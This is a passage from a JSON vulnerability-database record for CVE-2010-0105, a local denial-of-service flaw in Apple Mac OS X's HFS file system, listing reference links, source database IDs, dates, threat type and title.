      {
        "trust": 0.1,
        "url": "http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/vfs/vfs_cache.c"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6799"
      },
      {
        "trust": 0.1,
        "url": "http://cert.cx/stuff/l2.c"
      },
      {
        "trust": 0.1,
        "url": "http://cxsec.org/"
      },
      {
        "trust": 0.1,
        "url": "http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_catalog.c"
      },
      {
        "trust": 0.1,
        "url": "http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vnops.c"
      },
      {
        "trust": 0.1,
        "url": "http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vfsops.c"
      },
      {
        "trust": 0.1,
        "url": "http://cxsecurity.com/cveshow/cve-2013-6799/"
      },
      {
        "trust": 0.1,
        "url": "http://cxsecurity.com/issue/wlb-2014040027"
      },
      {
        "trust": 0.1,
        "url": "https://developer.apple.com/library/mac/documentation/darwin/reference/manpages/man3/snprintf.3.html"
      },
      {
        "trust": 0.1,
        "url": "http://cvemap.org/"
      },
      {
        "trust": 0.1,
        "url": "http://cxsecurity.com/issue/wlb-2010040284"
      },
      {
        "trust": 0.1,
        "url": "http://cxsecurity.com/issue/wlb-2005090063"
      },
      {
        "trust": 0.1,
        "url": "http://en.wikipedia.org/wiki/hard_link"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42710"
      },
      {
        "db": "BID",
        "id": "39658"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      },
      {
        "db": "PACKETSTORM",
        "id": "126039"
      },
      {
        "db": "PACKETSTORM",
        "id": "123948"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0105"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-42710"
      },
      {
        "db": "BID",
        "id": "39658"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      },
      {
        "db": "PACKETSTORM",
        "id": "126039"
      },
      {
        "db": "PACKETSTORM",
        "id": "123948"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0105"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2010-04-27T00:00:00",
        "db": "VULHUB",
        "id": "VHN-42710"
      },
      {
        "date": "2010-04-23T00:00:00",
        "db": "BID",
        "id": "39658"
      },
      {
        "date": "2010-11-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      },
      {
        "date": "2014-04-06T16:22:11",
        "db": "PACKETSTORM",
        "id": "126039"
      },
      {
        "date": "2013-11-08T21:29:02",
        "db": "PACKETSTORM",
        "id": "123948"
      },
      {
        "date": "2010-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      },
      {
        "date": "2010-04-27T15:30:01.217000",
        "db": "NVD",
        "id": "CVE-2010-0105"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2010-12-10T00:00:00",
        "db": "VULHUB",
        "id": "VHN-42710"
      },
      {
        "date": "2010-11-10T22:37:00",
        "db": "BID",
        "id": "39658"
      },
      {
        "date": "2010-11-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      },
      {
        "date": "2010-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      },
      {
        "date": "2024-11-21T01:11:32.463000",
        "db": "NVD",
        "id": "CVE-2010-0105"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "39658"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Apple Mac OS X hfs implementation denial of service (DoS) vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Design Error",
    "sources": [
      {
        "db": "BID",
        "id": "39658"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      }
    ],
    "trust": 0.9
  }
}

